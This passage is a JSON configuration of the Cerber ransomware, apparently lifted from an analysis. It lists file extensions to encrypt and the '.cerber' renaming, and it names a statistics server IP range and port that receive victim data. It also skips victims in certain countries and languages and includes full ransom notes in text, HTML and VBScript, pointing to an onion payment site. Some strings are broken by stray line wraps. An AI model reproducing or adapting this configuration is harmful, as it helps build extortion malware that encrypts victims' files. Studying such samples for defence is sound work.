".ab4",
".accde",
".accdr",
".accdt",
".ach",
".acr",
".adb",
".ads",
".agdl",
".ait",
".apj",
".asm",
".awg",
".back",
".backup",
".backupdb",
".bank",
".bay",
".bdb",
".bgt",
".bik",
".bpw",
".cdr3",
".cdr4",
".cdr5",
".cdr6",
".cdrw",
".ce1",
".ce2",
".cib",
".craw",
".crw",
".csh",
".csl",
".db_journal",
".dc2",
".dcs",
".ddoc",
".ddrw",
".der",
".des",
".dgc",
".djvu",
".dng",
".drf",
".dxg",
".eml",
".erbsql",
".erf",
".exf",
".ffd",
".fh",
".fhd",
".gray",
".grey",
".gry",
".hbk",
".ibank",
".ibd",
".ibz",
".iiq",
".incpas",
".jpe",
".kc2",
".kdbx",
".kdc",
".kpdx",
".lua",
".mdc",
".mef",
".mfw",
".mmw",
".mny",
".moneywell",
".mrw",
".myd",
".ndd",
".nef",
".nk2",
".nop",
".nrw",
".ns2",
".ns3",
".ns4",
".nwb",
".nx2",
".nxl",
".nyf",
".odb",
".odf",
".odg",
".odm",
".orf",
".otg",
".oth",
".otp",
".ots",
".ott",
".p12",
".p7b",
".p7c",
".pdd",
".pem",
".plus_muhd",
".plc",
".pot",
".pptx",
".psafe3",
".py",
".qba",
".qbr",
".qbw",
".qbx",
".qby",
".raf",
".rat",
".raw",
".rdb",
".rwl",
".rwz",
".s3db",
".sd0",
".sda",
".sdf",
".sqlite",
".sqlite3",
".sqlitedb",
".sr2",
".srf",
".srw",
".st5",
".st8",
".std",
".sti",
".stw",
".stx",
".sxd",
".sxg",
".sxi",
".sxm",
".tex",
".wallet",
".wb2",
".wpd",
".x11",
".x3f",
".xis",
".ycbcra",
".yuv"
],
"new_extension": ".cerber",
"network": 0,
"multithread": 1,
"rsa_key_size": 576,
"max_blocks": 5,
"min_file_size": 0,
"max_block_size": 2
},
"servers": {
"statistics": {
"ip": "87.98.128.0/19",
"data_finish": "{MD5_KEY}",
"data_start": "{MD5_KEY{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}",
"timeout": 1020,
"send_stat": 1,
"port": 6891
}
},
"blacklist": {
"files": [
"bootsect.bak",
"iconcache.db",
"thumbs.db",
"wallet.dat"
],
"folders": [
":\\$recycle.bin\\",
":\\$windows.~bt\\",
":\\boot\\",
":\\drivers\\",
":\\program files\\",
":\\program files (x86)\\",
":\\programdata\\",
":\\users\\all users\\",
":\\windows\\",
"\\appdata\\local\\",
"\\appdata\\locallow\\",
"\\appdata\\roaming\\",
"\\public\\music\\sample music\\",
"\\public\\pictures\\sample pictures\\",
"\\public\\videos\\sample videos\\",
"\\tor browser\\"
],
"languages": [
1049,
1058,
1059,
1064,
1067,
1068,
1079,
1087,
1088,
1090,
1091,
2072,
2073,
2092,
2115
],
"countries": [
"am",
"az",
"by",
"ge",
"kg",
"kz",
"md",
"ru",
"tm",
"tj",
"ua",
"uz"
]
},
"debug": 0,
"help_files": {
"files": [
{
"file_body": "\r\n\r\n n
C E R B E R\r\n n
-----------\r\n\r\n\r\n Your documents, photos, databases and other important files have
been encrypted!\r\n\r\n\r\n n To decrypt your files follow the instructions:\r\n\r\n\r\n
--------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https://www.torproject.
org/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n
http://decrypttozxybarc.onion/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this
website\r\n\r\n\r\n -------------------------------------------------------------------------------------- \r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\
u00bb\r\n",
"file_extension": ".txt"
},
{
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n
<link
href=\"http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\"
rel=\"stylesheet\">\r\n
<meta charset=\"utf-8\">\r\n
<meta content=\"IE=edge\"
http-equiv=\"X-UA-Compatible\">\r\n
<meta content=\"width=device-width, initialscale=1\" name=\"viewport\">\r\n
<title>C E R B E R</title>\r\n </head>\r\n
<body>\r\n
<div class=\"container\">\r\n
<h3 align=\"center\">C E R B E R</
h3>\r\n
<br />\r\n
<h4>Your documents, photos, databases and other important
files have been encrypted!<br /><br />To decrypt your files follow the instructions:</h4>\
r\n
<br />\r\n
<div class=\"well\">\r\n
<h4>1. Down
load and install the «Tor Browser» from <a href=\"https://www.torproject.org/
download/download-easy.html.en\" target=\"_blank\">https://www.torproject.org/</a></h4>\
r\n
<br />\r\n
<h4>2. Run it</h4>\r\n
<br />\r\n
<h4>3. In the «Tor Browser» open website:<br /><br /><div
class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\"
style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\"
value=\"http://decrypttozxybarc.onion/{PC_ID}\" readonly></div></h4>\r\n
<h4>4. Follow the instructions at this website</h4>\r\n
</div>\
r\n
<br />\r\n
<p style=\"color: #ccc;\">«...Quod me non necat me fortiorem
facit.»</p>\r\n
<br />\r\n
</div>\r\n </body>\r\n</html>\r\n",
"file_extension": ".html"
},
{
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention!
Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases
and other important files have been encrypted!\"\r\nNext",
"file_extension": ".vbs"
}
],